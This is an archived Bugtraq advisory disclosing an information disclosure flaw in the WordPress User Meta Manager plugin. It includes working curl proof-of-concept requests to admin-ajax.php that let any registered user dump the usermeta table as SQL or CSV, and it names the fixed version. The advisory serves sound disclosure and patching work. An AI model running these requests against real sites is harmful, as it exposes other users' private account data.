lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <56B83BB1.8090509@gmail.com>
Date: Mon, 8 Feb 2016 08:54:41 +0200
From: Panagiotis Vagenas <pan.vagenas@...il.com>
To: bugtraq@...urityfocus.com
Subject: WordPress User Meta Manager Plugin [Information Disclosure]

* Exploit Title: WordPress User Meta Manager Plugin [Information Disclosure]
* Discovery Date: 2015-12-28
* Public Disclosure Date: 2016-02-01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4
* Category: webapps

## Description

User Meta Manager for WordPress plugin up to v3.4.6 suffers from a
information disclosure vulnerability. Any registered user can perform an
a series of AJAX requests, in order to get all contents of `usermeta` DB
table.

`usermeta` table holds additional information for all registered users.
User Meta Manager plugin offers a `usermeta` table backup functionality.
During the backup process the plugin takes no action in protecting the
leakage of the table contents to unauthorized (non-admin) users.

## PoC

### Get as MySQL query

First a backup table must be created

 
```sh
curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
    ?action=umm_switch_action&amp;umm_sub_action=umm_backup"
```


Then we get the table with another request

```sh
curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
    ?action=umm_switch_action&amp;umm_sub_action=umm_backup&amp;mode=sql"
```

### Get as CSV file

```sh
curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
    ?action=umm_switch_action&amp;umm_sub_action=umm_get_csv"
```

## Solution

Upgrade to version 3.4.8

-- 
Panagiotis Vagenas
Web Developer / Security Enthusiast
6972883849 / 2105765611
[Twitter](http://twitter.com/panVagenas)
[LinkedIn](http://gr.linkedin.com/in/panvagenas)
[GitHub](http://github.com/panvagenas)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ